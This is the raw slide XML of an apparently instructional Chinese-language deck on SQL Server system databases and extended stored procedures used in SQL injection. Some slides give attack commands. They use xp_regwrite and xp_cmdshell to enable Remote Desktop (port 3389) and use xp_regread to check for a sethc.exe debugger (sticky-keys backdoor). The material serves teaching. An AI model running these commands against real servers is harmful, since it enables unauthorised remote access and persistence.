              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>开启3389端口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>​</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>exec master..xp_cmdshell "REG ADD 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fDenyTSConnections /t REG_DWORD /d 0"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5382060-16B7-4184-B4A2-0E966452D6DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1" y="68854"/>
            <a:ext cx="246286" cy="4718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50784" rIns="121920" bIns="50784" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{084890CD-A1AF-43E6-9F1F-EE5526FFBC38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1" y="68854"/>
            <a:ext cx="246286" cy="4718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50784" rIns="121920" bIns="50784" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E220F8F-95FD-4E07-9D70-EBAFADC15A5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1" y="68854"/>
            <a:ext cx="246286" cy="4718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50784" rIns="121920" bIns="50784" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA9B4B8C-68FC-4337-818B-F1780492C1B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1" y="68854"/>
            <a:ext cx="65" cy="4718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50784" rIns="0" bIns="50784" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1066601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43840" y="335251"/>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基本使用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="200661" y="1027853"/>
            <a:ext cx="11791527" cy="56425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spcAft>
                <a:spcPts val="667"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="u"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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的默认库</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRP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SQL Server安装4个系统数据库。它们分别是</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Helvetica"/>
              </a:rPr>
              <a:t>master数据库</a:t>
            </a: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Helvetica"/>
              </a:rPr>
              <a:t>model数据库</a:t>
            </a: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Helvetica"/>
              </a:rPr>
              <a:t>tempdb数据库</a:t>
            </a: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和</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Helvetica"/>
              </a:rPr>
              <a:t>msdb数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>。这些数据库是SQL Server的心脏和灵魂。</a:t>
            </a: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endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="380990" indent="-380990" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="667"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="u"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>默认库的详细介绍</a:t>
            </a:r>
            <a:endPar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endParaRP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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>master</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>数据库</a:t>
            </a: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（重要）：master数据库控制SQL Server的所有方面。这个数据库中包括所有的配置信息、用户登录信息、当前正在服务器中运行的过程的信息。</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>model</a:t>
            </a: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数据库：model数据库是建立所有用户数据库时的模板。当建立一个新数据库时，SQL Server会把model数据库中的所有对象建立一份拷贝并移到新数据库中。在模板对象被拷贝到新的用户数据库中之后，该数据库的所有多余空间都将被空页填满。</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>tempdb</a:t>
            </a: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数据库：这个库用来保存所有的临时表、存储过程和其他SQL Server建立的临时用的东西。</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>msdb</a:t>
            </a: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数据库：由 Enterprise Manager和Agent使用，记录着任务计划信息、事件处理信息、数据备份及恢复信息、警告及异常信息。</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12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="578296" y="893662"/>
            <a:ext cx="11035409" cy="283153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扩展存储过程</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a:t>
            </a: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扩展存储过程以</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>开头，主要使用外部程序语言编写的存储过程。</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如：</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xp_cmdshell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直接利用其执行命令， </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xp_subdirs</a:t>
            </a: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读取文件夹内的文件夹列表等</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b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xp_regread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a: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200000"/>
              </a:lnSpc>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xp_regread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>存储过程对注册表进行读取。</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D6C5DD-85E5-45F5-ACB4-9F24B45E110F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1878644" y="4227435"/>
            <a:ext cx="8434709" cy="861768"/>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60957" tIns="60957" rIns="60957" bIns="60957" numCol="1" spcCol="38100" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>读取注册查看是否修改成功</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger' </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5382060-16B7-4184-B4A2-0E966452D6DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1" y="68854"/>
            <a:ext cx="246286" cy="4718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50784" rIns="121920" bIns="50784" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{084890CD-A1AF-43E6-9F1F-EE5526FFBC38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1" y="68854"/>
            <a:ext cx="246286" cy="4718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50784" rIns="121920" bIns="50784" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E220F8F-95FD-4E07-9D70-EBAFADC15A5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1" y="68854"/>
            <a:ext cx="246286" cy="4718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50784" rIns="121920" bIns="50784" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A05E902-8D3E-402F-8090-3E2F39C99037}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1" y="68854"/>
            <a:ext cx="246286" cy="471892"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F8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50784" rIns="121920" bIns="50784" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34255746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注入拓展</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432647" y="3730414"/>
            <a:ext cx="8090747" cy="4924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defTabSz="1219170" hangingPunct="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="578296" y="893662"/>
            <a:ext cx="11035409" cy="86176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的特殊功能</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扩展存储过程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="379191" indent="-379191">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>在SQL注入攻击过程中，最常利用到的扩展存储</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="578295" y="5202292"/>
            <a:ext cx="8140700" cy="118756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marL="380990" indent="-380990" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
